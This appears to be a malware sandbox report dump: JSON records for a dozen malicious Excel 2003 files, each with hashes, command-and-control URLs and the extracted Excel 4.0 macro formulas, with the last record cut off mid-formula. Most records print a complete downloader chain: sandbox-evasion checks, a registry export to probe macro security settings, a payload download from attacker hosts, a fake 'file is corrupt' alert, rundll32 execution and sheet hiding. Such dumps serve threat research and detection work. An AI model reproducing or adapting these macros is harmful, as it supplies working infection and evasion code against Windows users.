{"version":"0.2","sample":{"sample":"","kind":"file","target":"256b279cc499295c2a7eb9c9ed643e92d4fbd7808325afaf25b43879f02153e6"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"256b279cc499295c2a7eb9c9ed643e92d4fbd7808325afaf25b43879f02153e6","filesize":225280,"md5":"4820edba2fe2a2c6513e202372772adc","sha1":"b36b2389279916d510cf0774c686e7249a7fbe34","sha256":"256b279cc499295c2a7eb9c9ed643e92d4fbd7808325afaf25b43879f02153e6","sha512":"b2e94177455005ed261dfaea372cee62f81bbc37f076dc565a62bae42d63c904d203c363ea3ea9f2931f8df0da98ad3cd753f4ebf3e216e0b69daa49e3c13de4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"256b279cc499295c2a7eb9c9ed643e92d4fbd7808325afaf25b43879f02153e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"h24iKuehxP\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"256bbe555af14dcfe138d8e6ee89bdc12b9e1b1174464697e939c62981876ff2"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"256bbe555af14dcfe138d8e6ee89bdc12b9e1b1174464697e939c62981876ff2","filesize":226304,"md5":"2d98457db311a957d955d1c27d209a87","sha1":"faeef77521319ab591f96d1448ab3c5c9eed652f","sha256":"256bbe555af14dcfe138d8e6ee89bdc12b9e1b1174464697e939c62981876ff2","sha512":"f7532cef8c34bca025c6daff68fe4e90fc7bc6d38d32baa55a0793866aed8c734ab6cce04579e6924b95e68e2eaff24bcf8240cf0a616c044f98fce291f62299","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"256bbe555af14dcfe138d8e6ee89bdc12b9e1b1174464697e939c62981876ff2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rQtfOKkVai\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"256d9213d7a640704cd031c61dad6bb4d32d2d9896ca797bf8c2d9d4533fbb10"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"256d9213d7a640704cd031c61dad6bb4d32d2d9896ca797bf8c2d9d4533fbb10","filesize":209920,"md5":"b0ac6ae29249bc2d82a8135057c341f7","sha1":"dbc1466820278964613220c77825c1e7c1cc1311","sha256":"256d9213d7a640704cd031c61dad6bb4d32d2d9896ca797bf8c2d9d4533fbb10","sha512":"2a0fb252ed8584f8d97da93f0518c17628a4a4bd9e289fc32684395251a62c03d62ada3fbcedac631b08a78a85d7a9d8ff1318ce844905bb675e36c935cd1e04","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"256d9213d7a640704cd031c61dad6bb4d32d2d9896ca797bf8c2d9d4533fbb10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JV7dKNJxy3\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"256fa7c39e92a9d5ca30cd499761986eebb5e4a76638000016a040addd1700b6"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"256fa7c39e92a9d5ca30cd499761986eebb5e4a76638000016a040addd1700b6","filesize":221184,"md5":"33875d947cf9776e9d4d70fe6f5d21f4","sha1":"abc28309cbd5809832ba7c3aee5412bbc93e5a91","sha256":"256fa7c39e92a9d5ca30cd499761986eebb5e4a76638000016a040addd1700b6","sha512":"c106bc15291db3758550268d08d7040d71f543372c1b2d9e23869dc5eb0078ea26f7ec4d5c5a55ac9edc53f8b6ca97f1a01c8dc539dd39d121f13fbdcd818e10","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"256fa7c39e92a9d5ca30cd499761986eebb5e4a76638000016a040addd1700b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Piq9dNgHYn\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2578cebeef3b6198a6880a2f78fc040d7b269e02474e7dbb9b3e95d02812c2e5"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"2578cebeef3b6198a6880a2f78fc040d7b269e02474e7dbb9b3e95d02812c2e5","filesize":209920,"md5":"2a159536cb023939e106042798ac2880","sha1":"a9847d82d2235cfd3b942015bee9e046151534be","sha256":"2578cebeef3b6198a6880a2f78fc040d7b269e02474e7dbb9b3e95d02812c2e5","sha512":"0c9ef4402311fb04a8d582a09c8c05878eb9310dadf2ab39f1d3d7498f586b4d4438481bd274a11a4766eb5384e31312861150ad2ce16f04e40ed3952c9974f2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2578cebeef3b6198a6880a2f78fc040d7b269e02474e7dbb9b3e95d02812c2e5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XIti2vuaKD\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25821076bde5f4075b4d0d791dfa5e97942b918032b95a22449795e1ae44c0fa"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25821076bde5f4075b4d0d791dfa5e97942b918032b95a22449795e1ae44c0fa","filesize":212992,"md5":"7ec107beb96f836576f7d8432eed37ac","sha1":"101325bc83edf01273bccde6f16f005b5169087e","sha256":"25821076bde5f4075b4d0d791dfa5e97942b918032b95a22449795e1ae44c0fa","sha512":"723e6f1e638a61cc5e9d9533541689128a580eba055c6b6652b210f842cc9e5949fe4e7a7f38735733c42638d69979d2416ec57c9e01bb11bc91f29b05a0fd71","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25821076bde5f4075b4d0d791dfa5e97942b918032b95a22449795e1ae44c0fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lAWGm4uhiE\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"259e78044d764b16a8278b40b503e54033f3643bf9f4647fe5459158e69c8fbe"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"259e78044d764b16a8278b40b503e54033f3643bf9f4647fe5459158e69c8fbe","filesize":112128,"md5":"f79af7cc2e04a02115a9433de07f8009","sha1":"e78ecf54944cfc10582053ab4beee20ab41de55d","sha256":"259e78044d764b16a8278b40b503e54033f3643bf9f4647fe5459158e69c8fbe","sha512":"e8dddeeba923b96cd44b46982344a712594bb49da55fb1e0613fd854d8607fa06924721c5ea7e5c6d74398c45f297d2837622bc3420754b16eedcdbb6eec19a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"259e78044d764b16a8278b40b503e54033f3643bf9f4647fe5459158e69c8fbe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25a5b5d6633e07e17bfc7528440a424060291d5b5f0cc058856ffaacf4e46007"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25a5b5d6633e07e17bfc7528440a424060291d5b5f0cc058856ffaacf4e46007","filesize":185344,"md5":"9d98a8a55fc3d2e7826b6682ada4adc4","sha1":"f58af2d23d4c6a1a663af38c468b96b15bba1329","sha256":"25a5b5d6633e07e17bfc7528440a424060291d5b5f0cc058856ffaacf4e46007","sha512":"2e3cae7ab9a6f1c945f42ef72f23fd22559a4ff642767fc2496e45f03daa3a2c54fa7cd9b2faffcc78dffc4226c2148dde440b9e80235f5e58a3ad8c250e7db4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25a5b5d6633e07e17bfc7528440a424060291d5b5f0cc058856ffaacf4e46007.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25be9c4d043d223aa2bd2471c4cfcb79aea74872ee15527bb9012fc9a61b0ecf"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25be9c4d043d223aa2bd2471c4cfcb79aea74872ee15527bb9012fc9a61b0ecf","filesize":206336,"md5":"0b52734a41566cbae32b834cac933abf","sha1":"48c309feffb1dcbfe9b3322b8c446f72fce3f574","sha256":"25be9c4d043d223aa2bd2471c4cfcb79aea74872ee15527bb9012fc9a61b0ecf","sha512":"2e20e093aaf1cd704ff836ab2ec30cb10b2ebc362c9cf6147298e91513732b49d963cc3a50a8908549eee65348e484158ed26713ef8fb57acee0d2713ec98dc9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25be9c4d043d223aa2bd2471c4cfcb79aea74872ee15527bb9012fc9a61b0ecf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Z5OAyl6Vo9\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25c3c44e3eb700bc26528cd5518d10f3c0ce9bbca42e558455f56b3c743a47bc"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25c3c44e3eb700bc26528cd5518d10f3c0ce9bbca42e558455f56b3c743a47bc","filesize":226304,"md5":"c6d7c24ae881cab6dcd433e9789f6373","sha1":"10bbf86825a188861332438467feade1dc00d9ca","sha256":"25c3c44e3eb700bc26528cd5518d10f3c0ce9bbca42e558455f56b3c743a47bc","sha512":"fd455335ff93156adb8e5b781005d4a3ae936e3e0ceb4dbf45dbf719327f71827836046e1b15821605026ef3b3ee518dfc18cac1743d5e46e0b3797b7cbdbd41","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25c3c44e3eb700bc26528cd5518d10f3c0ce9bbca42e558455f56b3c743a47bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NsDpPc7D4T\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25cdb03617fe0a57564e6cdfae098d2059ffd6256a740cbad0e46fafb4ec47ea"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25cdb03617fe0a57564e6cdfae098d2059ffd6256a740cbad0e46fafb4ec47ea","filesize":160768,"md5":"1096f765bafeeead766cc7ec62b7b0d2","sha1":"224bfeb18171b16fcd6beb027458779e23a1b93b","sha256":"25cdb03617fe0a57564e6cdfae098d2059ffd6256a740cbad0e46fafb4ec47ea","sha512":"0a9b9863bae66c80732dd79ac930057e1e4d6405166a8ec8607d5675aee5806276d972b5cbce0ca5d0f5b5c7fa0a37279b07c5ffd58597a047ada535aa9b653e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25cdb03617fe0a57564e6cdfae098d2059ffd6256a740cbad0e46fafb4ec47ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VgIpjvvzgn\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25e10d3c5ad615598c4c1da8a5628b4a505ba061b5d1871661cc6b37bbd990bb"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25e10d3c5ad615598c4c1da8a5628b4a505ba061b5d1871661cc6b37bbd990bb","filesize":228864,"md5":"8aedecae225fb4d183551c0584799619","sha1":"b309f56831db26092dbb009046b14b4d3e49109f","sha256":"25e10d3c5ad615598c4c1da8a5628b4a505ba061b5d1871661cc6b37bbd990bb","sha512":"15b16d8148162c306c60c4d980344d5c874091040e3cd4a17b739f2a467df35a1d86b2158e74130f62d8fd023361399ccdd3f7824a9502fe45a34c7592390ac5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25e10d3c5ad615598c4c1da8a5628b4a505ba061b5d1871661cc6b37bbd990bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yjqoXPnApR\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25ecebce310b4d1bf0f66f639bb4b92881d0af8b005e402a142b726974642b93"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25ecebce310b4d1bf0f66f639bb4b92881d0af8b005e402a142b726974642b93","filesize":177152,"md5":"6a5604036f5548409003377222990071","sha1":"a50d20faeae128e3153386e3588baec70e9c2038","sha256":"25ecebce310b4d1bf0f66f639bb4b92881d0af8b005e402a142b726974642b93","sha512":"7b0992d5744cf01924718e13c1fae8575c03e3c95a83f280c86c390f47dbb49a4cb470caae182f3401c0ceb583a7f211ee56398959b20f0612d636bc2ef9a956","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25ecebce310b4d1bf0f66f639bb4b92881d0af8b005e402a142b726974642b93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, 